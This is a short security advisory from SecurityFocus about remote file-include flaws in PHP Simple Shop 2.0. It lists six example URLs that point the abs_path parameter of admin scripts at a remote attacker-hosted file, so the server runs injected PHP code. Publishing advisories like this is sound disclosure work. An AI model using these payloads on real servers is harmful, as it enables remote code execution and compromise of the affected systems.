source: https://www.securityfocus.com/bid/19382/info
PHP Simple Shop is prone to multiple remote file-include vulnerabilities.
An attacker can exploit these issues to execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
Version 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[phpsimpleshop_path]/admin/index.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminindex.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/adminglobal.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/login.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/menu.php?abs_path=http://www.example2.com/inject.txt? http://www.example.com/[phpsimpleshop_path]/admin/header.php?abs_path=http://www.example2.com/inject.txt?